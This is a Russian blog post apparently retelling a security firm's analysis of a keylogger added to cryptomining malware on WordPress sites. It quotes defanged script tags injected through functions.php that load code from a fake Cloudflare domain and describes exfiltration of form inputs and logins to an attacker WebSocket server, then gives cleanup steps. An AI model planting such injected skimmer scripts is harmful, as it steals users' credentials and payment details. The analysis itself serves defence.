БЛОГ


НА БОЛЕЕ, ЧЕМ 5000 САЙТАХ, ПОД УПРАВЛЕНИЕМ WORDPRESS ОБНАРУЖЕН КЕЙЛОГЕР

К вредоносному скрипту криптомайнинга cloudflare.solutions, который несколько недель назад был обнаружен специалистами Sucuri, добавлена новая функция кейлогера.

Вводная часть этой вредоносной программы вообще не изменилась, и использует function.php , чтобы вызвать следующие сценарии на страницах WordPress:

 

<script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'> </ script>

 <script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/cors/cors.js'> </ script>

 

URL-адреса сценариев также совпадают, однако они используют поддельный домен CloudFlare. Первая  (reconnecting-websocket.js) по-прежнему загружает копию законной библиотеки ReconnectingWebSocket .

Основное изменение - скрипт cors.js. Теперь, после его декодирования там нет абсолютно подозрительного кода. Также скрипт загружает Яндекс Метрику, скорее всего, это делается для отслеживания зараженных сайтов. Кстати, идентификатор  этого Яндекс скрипта - 43930119 - его можно найти в HTML-коде главной страницы.

Как поддельные URL-адреса превращаются в кейлоггер.

В коде присутствуют два URL cdnjs.cloudflare.com с длинными шестнадцатеричными параметрами:

На этот раз имена доменов действительно принадлежат CloudFlare, и можно подумать, что это что-то легитимное. Но  если проверить URL  https://cdnjs.cloudflare.com/ajax/libs/linter/linter.js , можно заметить, что он фактически не существует.

Если посмотреть код с использованием переменных linterkey, становится понятно, что cdnjs.cloudflare.com это просто отвлекающий маневр, а реально «полезная нагрузка»- шестнадцатеричные цифры после знака вопроса в URL-адресах. Скрипт их декодирует и выводит в веб-страницы следующий результат:

Как видите, это кейлоггер. Этот скрипт добавляет обработчик для каждого поля ввода на сайтах, чтобы отправить его значение злоумышленнику (WSS://CloudFlare[.]решения:8085/), когда пользователь покидает поле.

Какие данные могут быть украдены таким способом? Поскольку речь идет о сайтах WordPress, такие сайты обычно имеют поля поиска и формы комментариев, что вряд ли интерисует взломщика. Но если WordPress сайт имеет функции электронной коммерции и имеет форму заказа? Этот сценарий позволяет хакеру украсть платежные реквизиты.

И, конечно, каждый сайт WordPress имеет форму авторизации. Хакеры не забывают об этом, поэтому добавляют код, который размещает кейлоггер на странице входа в систему.

Как можно увидеть имя и пароль пользователя были отправлены на сервер cloudflare [.] еще до того, как пользователь нажмет кнопку «Войти».

Вредоносный код находится в function.ph. Необходимо удалить функцию add_js_scripts и все строки add_action, которые содержат add_js_scripts.

Учитывая функциональность этой вредоносной программы нужно заменить пароли, поскольку вернее всего они  скомпрометированы. Также не забудьте проверить свой сайт на наличие других вредоносных скриптов.